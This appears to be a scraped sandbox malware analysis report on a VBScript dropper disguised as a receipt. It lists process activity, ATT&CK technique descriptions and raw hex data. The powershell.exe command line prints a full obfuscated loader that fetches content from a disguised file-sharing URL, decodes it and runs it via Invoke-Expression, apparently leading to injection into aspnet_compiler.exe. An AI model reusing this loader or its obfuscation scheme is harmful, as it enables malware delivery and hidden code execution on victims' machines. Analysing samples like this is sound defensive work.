-34-33-30-30-36-46-30-30-36-44-30-30-36-44-30-30-36-35-30-30-36-45-30-30-37-34-30-30-37-33-30-30-30-30-30-30-30-30-30-30-30-30-30-30-32-32-30-30-30-31-30-30-30-31-30-30-34-33-30-30-36-46-30-30-36-44-30-30-37-30-30-30-36-31-30-30-36-45-30-30-37-39-30-30-34
2021-09-14 14:47:59 UTC	510	IN	Data Raw: 37 39 2d 37 34 2d 36 35 2d 35 62 2d 35 64 2d 35 64 2d 32 34 2d 34 38 2d 33 36 2d 33 64 2d 32 30 2d 35 36 2d 34 39 2d 35 30 2d 32 30 2d 32 34 2d 34 38 2d 34 38 2d 30 61 2d 32 34 2d 36 31 2d 36 31 2d 32 30 2d 33 64 2d 32 30 2d 32 37 2d 34 65 2d 34 35 2d 35 34 2d 32 65 2d 35 30 2d 34 35 2d 32 37 2d 30 61 2d 32 34 2d 36 32 2d 36 32 2d 32 30 2d 33 64 2d 32 30 2d 32 37 2d 34 32 2d 36 31 2d 36 34 2d 36 37 2d 36 35 2d 37 32 2d 32 37 2d 30 61 2d 32 34 2d 36 66 2d 36 66 2d 32 30 2d 33 64 2d 32 37 2d 34 37 2d 36 35 2d 37 34 2d 34 38 2d 34 39 2d 35 33 2d 35 34 2d 34 66 2d 35 32 2d 35 32 2d 35 39 2d 32 37 2d 32 65 2d 35 32 2d 36 35 2d 37 30 2d 36 63 2d 36 31 2d 36 33 2d 36 35 2d 32 38 2d 32 32 2d 34 38 2d 34 39 2d 35 33 2d 35 34 2d 34 66 2d 35 32 2d 35 32 2d 35 39 2d Data Ascii: 79-74-65-5b-5d-5d-24-48-36-3d-20-56-49-50-20-24-48-48-0a-24-61-61-20-3d-20-27-4e-45-54-2e-50-45-27-0a-24-62-62-20-3d-20-27-42-61-64-67-65-72-27-0a-24-6f-6f-20-3d-27-47-65-74-48-49-53-54-4f-52-52-59-27-2e-52-65-70-6c-61-63-65-28-22-48-49-53-54-4f-52-52-59-

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exe PID: 740 Parent PID: 3424

General

Start time:	16:47:08
Start date:	14/09/2021
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\14 Items receipt.vbs'
Imagebase:	0x7ff601610000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.852066137.000001E92ABE5000.00000004.00000040.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.851319653.000001E92A949000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.850032751.000001E92A945000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.850431281.000001E92A96B000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.852419198.000001E92C690000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.851342619.000001E92A954000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.851386898.000001E92A96C000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.850214818.000001E92A953000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000002.851469736.000001E92A97A000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.850267004.000001E92A948000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: 00000001.00000003.849051938.000001E92C691000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 3184 Parent PID: 740

General

Start time:	16:47:09
Start date:	14/09/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/pNpqqh/yghtfH-Htxt'.Replace('H-H','.');$SOS='%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-!5-X-!-X-!7-X-!8-X-!a-X-%0-X-3d-X-%0-X-%7-X-e-X-!5-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-!5-X-%-X-!3-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-5!-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-7!-X-%e-X-57-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%b-X-%7-X-%c-X-%7-X-c-X-!9-X-!5-X-!e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%0-X-3d-X-%0-X-%7-X-!!-X-!f-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-1-X-!!-X-53-X-5!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%a-X-%7-X-%c-X-%7-X-57-X-e-X-!c-X-f-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-7%-X-!9-X-e-X-%7-X-%9-X-3b-X-0a-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-3d-X-%7-X-!9-X-0-X-!5-X-58-X-%8-X-e-X-0-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-0-X-3-X-0-X-5!-X-%0-X-%!-X-!5-X-!!-X-5%-X-!-X-!7-X-!8-X-!e-X-!a-X-!d-X-!b-X-!!-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-!7-X-!%-X-!8-X-!e-X-!a-X-53-X-!!-X-!-X-!7-X-!8-X-%9-X-%7-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%d-X-%7-X-%c-X-%7-X-5-X-0-X-57-X-0-X-%d-X-!f-X-%-X-a-X-0-X-!5-X-%7-X-%9-X-%e-X-5%-X-5-X-70-X-c-X-1-X-3-X-5-X-%8-X-%7-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3c-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-3e-X-%7-X-%c-X-%7-X-!5-X-!-X-!7-X-!8-X-!a-X-%9-X-%e-X-%!-X-53-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!e-X-!a-X-58-X-!!-X-!3-X-!-X-5-X-!7-X-!%-X-!8-X-!a-X-!b-X-%8-X-%!-X-53-X-5a-X-58-X-!!-X-!3-X-!-X-5-X-%7-X-%9-X-3b-X-0a-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-%8-X-%!-X-53-X-57-X-58-X-!!-X-!5-X-!3-X-5%-X-!-X-!7-X-59-X-!8-X-55-X-!a-X-!9-X-53-X-!!-X-!-X-5-X-!7-X-!8-X-!a-X-%0-X-%d-X-!a-X-f-X-9-X-e-X-%0-X-%7-X-%7-X-%9-X-7c-X-%-X-%8-X-%7-X-!9-X-%7-X-%b-X-%7-X-!5-X-58-X-%7-X-%9-X-3b'.Replace('%','2').Replace('!','4').Replace('','6');Invoke-Expression (-join ($SOS -split '-X-' \| ? { $_ } \| % { [char][convert]::ToUInt32($_,16) }))
Imagebase:	0x7ff7bedd0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 2264 Parent PID: 3184

General

Start time:	16:47:10
Start date:	14/09/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: aspnet_compiler.exe PID: 6012 Parent PID: 3184

General

Start time:	16:48:24
Start date:	14/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0x3f0000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: aspnet_compiler.exe PID: 5192 Parent PID: 3184

General

Start time:	16:48:24
Start date:	14/09/2021
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
Imagebase:	0xb50000
File size:	55400 bytes
MD5 hash:	17CC69238395DF61AAF483BCEF02E7C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 14 Items receipt.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Sigma Overview

AV Detection:

E-Banking Fraud:

System Summary:

Stealing of Sensitive Information:

Remote Access Functionality:

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre